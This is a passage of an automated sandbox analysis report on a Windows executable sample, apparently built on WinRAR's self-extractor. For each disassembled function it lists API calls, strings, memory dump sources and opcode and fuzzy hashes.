                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: *
                                                                                                                    • API String ID: 2691759472-163128923
                                                                                                                    • Opcode ID: 9c041b68db0682d198af08524768bc48588f9162fbb637f189c16be463888250
                                                                                                                    • Instruction ID: 31450cb7bb377d7d5753c320bfd87a602d98e24e53f84290aa72bb05d1a0d17d
                                                                                                                    • Opcode Fuzzy Hash: 9c041b68db0682d198af08524768bc48588f9162fbb637f189c16be463888250
                                                                                                                    • Instruction Fuzzy Hash: B83126222443029ABE30BE548807A7B7FEEFF91B10F14881EFD8477153EB668D459361
                                                                                                                    Function 0059B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: 3940c87f394ba2b508f5ca2fabbe8a00e6299c504dfcd5f6c8e036bf2762caea
                                                                                                                    • Instruction ID: 74c712bd5ef85675dfd13a244dec9465c9560a110b2b5ad109712253153ce8c4
                                                                                                                    • Opcode Fuzzy Hash: 3940c87f394ba2b508f5ca2fabbe8a00e6299c504dfcd5f6c8e036bf2762caea
                                                                                                                    • Instruction Fuzzy Hash: 172104729043065AFF30EA64EA49E6EBBDCFF92714F05042AF540C3101FB64DD4883A2
                                                                                                                    Function 0058F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0058F2E4
                                                                                                                      • Part of subcall function 0058F2C5: GetProcAddress.KERNEL32(005C81C8,CryptUnprotectMemory), ref: 0058F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0058F33E), ref: 0058F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0058F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 0058F389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: 2d25eb3bed0dd5c9f99f79359f9348a45a138760f6b61e2ae7c0d35aaa928c3c
                                                                                                                    • Instruction ID: 9b41962d6836336751f1705a51e49f528ca3a056594c1f55c86e7c7d8eebd9d1
                                                                                                                    • Opcode Fuzzy Hash: 2d25eb3bed0dd5c9f99f79359f9348a45a138760f6b61e2ae7c0d35aaa928c3c
                                                                                                                    • Instruction Fuzzy Hash: 86112231600A29AFDF12BF24DC49A7E3F94FF58720B14452AFC417B291DE34AE019790
                                                                                                                    Function 0059101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00591160,?,00000000,00000000), ref: 00591043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0059108A
                                                                                                                      • Part of subcall function 00586C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00586C54
                                                                                                                      • Part of subcall function 00586DCB: _wcschr.LIBVCRUNTIME ref: 00586E0A
                                                                                                                      • Part of subcall function 00586DCB: _wcschr.LIBVCRUNTIME ref: 00586E19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                                    • Opcode ID: 25e7e31d97a54375c4da57ddb09ce6df5daf000dc2d18e1b5f8aef033d011f01
                                                                                                                    • Instruction ID: 08fe22bd5d6aec612dda87c75009a56d54f88d4d386cef1bdd785a0643779a8a
                                                                                                                    • Opcode Fuzzy Hash: 25e7e31d97a54375c4da57ddb09ce6df5daf000dc2d18e1b5f8aef033d011f01
                                                                                                                    • Instruction Fuzzy Hash: 0F012B7534470A6FD7306E649C5DF767BD8FB40350F10002DF98362281CAA17C848728
                                                                                                                    Function 0058C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: <9[$?*<>|"
                                                                                                                    • API String ID: 2691759472-2631332886
                                                                                                                    • Opcode ID: d58a588a0b15308c92663880efffcf12d130b3c0d178136baaf71f2fd0b0079f
                                                                                                                    • Instruction ID: 3d0811cce03c224c6e4c0cf09c699875e63a0343ff7c3324a4914bfb2943b126
                                                                                                                    • Opcode Fuzzy Hash: d58a588a0b15308c92663880efffcf12d130b3c0d178136baaf71f2fd0b0079f
                                                                                                                    • Instruction Fuzzy Hash: CAF0D113A45302C1D7303E28A80573ABFE4FF917A0F34081EE8C4AB2C2E6B188C08375
                                                                                                                    Function 0059DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: Software\WinRAR SFX$Y
                                                                                                                    • API String ID: 176396367-2819317119
                                                                                                                    • Opcode ID: 842561558736385bbfde5331a306920480fc532c575fed07497e3dc4d9650844
                                                                                                                    • Instruction ID: 173ba8dd15dff640acb47de41823e2f9b00770871b53a816b45139d01e6f3822
                                                                                                                    • Opcode Fuzzy Hash: 842561558736385bbfde5331a306920480fc532c575fed07497e3dc4d9650844
                                                                                                                    • Instruction Fuzzy Hash: 6701DF71400158BAEF229B90DC4EFDF3F7CFB15394F000052B549A50A0DBB04B88DBA0
                                                                                                                    Function 0059AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00591FE5
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00591FF6
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00592006
                                                                                                                      • Part of subcall function 00591FDD: _wcslen.LIBCMT ref: 00592014
                                                                                                                      • Part of subcall function 00591FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0058B371,?,?,00000000,?,?,?), ref: 0059202F
                                                                                                                      • Part of subcall function 0059AC04: SetCurrentDirectoryW.KERNELBASE(?,0059AE72,C:\Users\user\Desktop,00000000,005C946A,00000006), ref: 0059AC08
                                                                                                                    • _wcslen.LIBCMT ref: 0059AE8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                                    • String ID: <Y$C:\Users\user\Desktop
                                                                                                                    • API String ID: 521417927-1445635403
                                                                                                                    • Opcode ID: ef0037ecab918e1e932bacf9ed2fe0e1ef31ec736b5a657540a393b99c5c0c41
                                                                                                                    • Instruction ID: 6feeb43cc96534a51136e520c6f8e74c470a526d9366a87a1fe4ab196fd004e9
                                                                                                                    • Opcode Fuzzy Hash: ef0037ecab918e1e932bacf9ed2fe0e1ef31ec736b5a657540a393b99c5c0c41
                                                                                                                    • Instruction Fuzzy Hash: 6A01B171C0025AA9DF10ABA4DD0EEDF3BFCBF48300F000455F502E3181EBB496448BA1
                                                                                                                    Function 005ABB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005A97E5: GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                      • Part of subcall function 005A97E5: _free.LIBCMT ref: 005A981C
                                                                                                                      • Part of subcall function 005A97E5: SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                      • Part of subcall function 005A97E5: _abort.LIBCMT ref: 005A9863
                                                                                                                    • _abort.LIBCMT ref: 005ABB80
                                                                                                                    • _free.LIBCMT ref: 005ABBB4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                                    • String ID: p[
                                                                                                                    • API String ID: 289325740-3527190296
                                                                                                                    • Opcode ID: a9ca30382c0144fdb73aafd07f47119d1f57fbf846d32af933649096fb3d01cf
                                                                                                                    • Instruction ID: 32d53c3f9ff812b2650666ac46bcddca45cdc3a6f02d20368fcb2829795affb1
                                                                                                                    • Opcode Fuzzy Hash: a9ca30382c0144fdb73aafd07f47119d1f57fbf846d32af933649096fb3d01cf
                                                                                                                    • Instruction Fuzzy Hash: E201D635D0163ADBDB21AF68C80226DBFB1BF46720B190209E81567292CB347D01CFE1
                                                                                                                    Function 0059B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: (Y$ZY
                                                                                                                    • API String ID: 2696272793-269396080
                                                                                                                    • Opcode ID: 598e0f79adff08921bac2ca19679270cb3a198fc5837f3c15e55c723833b3523
                                                                                                                    • Instruction ID: 462ec84bd3f3d440629c6463137d22a238babf97bbb252f9da089e167d1667d3
                                                                                                                    • Opcode Fuzzy Hash: 598e0f79adff08921bac2ca19679270cb3a198fc5837f3c15e55c723833b3523
                                                                                                                    • Instruction Fuzzy Hash: CD01FB76640119FFEF059FB0DD8DCAEBB6DFF143547104155B906D7120E631AA48EB60
                                                                                                                    Function 005A8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005ABF30: GetEnvironmentStringsW.KERNEL32 ref: 005ABF39
                                                                                                                      • Part of subcall function 005ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005ABF5C
                                                                                                                      • Part of subcall function 005ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005ABF82
                                                                                                                      • Part of subcall function 005ABF30: _free.LIBCMT ref: 005ABF95
                                                                                                                      • Part of subcall function 005ABF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005ABFA4
                                                                                                                    • _free.LIBCMT ref: 005A82AE
                                                                                                                    • _free.LIBCMT ref: 005A82B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID: 0"^
                                                                                                                    • API String ID: 400815659-4031448657
                                                                                                                    • Opcode ID: 5c929111c1c7f06bccc740932f5601b2cf714ff19d1f2c39c694fb5af6827043
                                                                                                                    • Instruction ID: 8face69ec5408507bc777d349c615dd0481632f8334bb94670fe221706f35086
                                                                                                                    • Opcode Fuzzy Hash: 5c929111c1c7f06bccc740932f5601b2cf714ff19d1f2c39c694fb5af6827043
                                                                                                                    • Instruction Fuzzy Hash: 4AE0223BA06D8345A265323A3C4A77F0E487FC3338F580726FA20CB0C7CE60880204E2
                                                                                                                    Function 00590FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00591206,?), ref: 00590FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00590FF6
                                                                                                                      • Part of subcall function 00586C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00586C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00590FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    • Opcode ID: 35bf368e3233f1b9fd735e2a35e3353084aa878ed5007e5a0d16eb364cbb76e3
                                                                                                                    • Instruction ID: 880586e4cf9b33205c84622da3a72419ba5c606da98a5497f531541365431b7f
                                                                                                                    • Opcode Fuzzy Hash: 35bf368e3233f1b9fd735e2a35e3353084aa878ed5007e5a0d16eb364cbb76e3
                                                                                                                    • Instruction Fuzzy Hash: 5FD02B315085353BCB1033245D0DD6E3C04BF62331F100704F439701E2CA214D855795
                                                                                                                    Function 0058E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0058DA55,?), ref: 0058E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0058DA55,?), ref: 0058E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    • Opcode ID: 4afa6fbc004c5f9688cc1e21ba412b9585a24a4c791e769611b3a347bc2ab702
                                                                                                                    • Instruction ID: 3be645989030478ea8f6d56b3e9a7ebc0a9e4007e4d96f90c0ffe0d28252e21f
                                                                                                                    • Opcode Fuzzy Hash: 4afa6fbc004c5f9688cc1e21ba412b9585a24a4c791e769611b3a347bc2ab702
                                                                                                                    • Instruction Fuzzy Hash: DAC0123128471066E77037646C0DB936E586F11B11F150548B581F91D1D6A5E54497A0
                                                                                                                    Function 0059E47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E467
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: UY$zY
                                                                                                                    • API String ID: 1269201914-3833174144
                                                                                                                    • Opcode ID: 01c0e82ec6f3b3d29999ac171324ec6f24255c89e08a1c5d6ae3c250d81ac87a
                                                                                                                    • Instruction ID: ab044df3f0aa841783691d63e1e79a2a31f0989e45be500b59972f83ac4d70cb
                                                                                                                    • Opcode Fuzzy Hash: 01c0e82ec6f3b3d29999ac171324ec6f24255c89e08a1c5d6ae3c250d81ac87a
                                                                                                                    • Instruction Fuzzy Hash: CAB012E12681417C3A08D1591C0FE370E4CF1C0F10330446EF449C5081EC801F020432
                                                                                                                    Function 0059E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E467
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
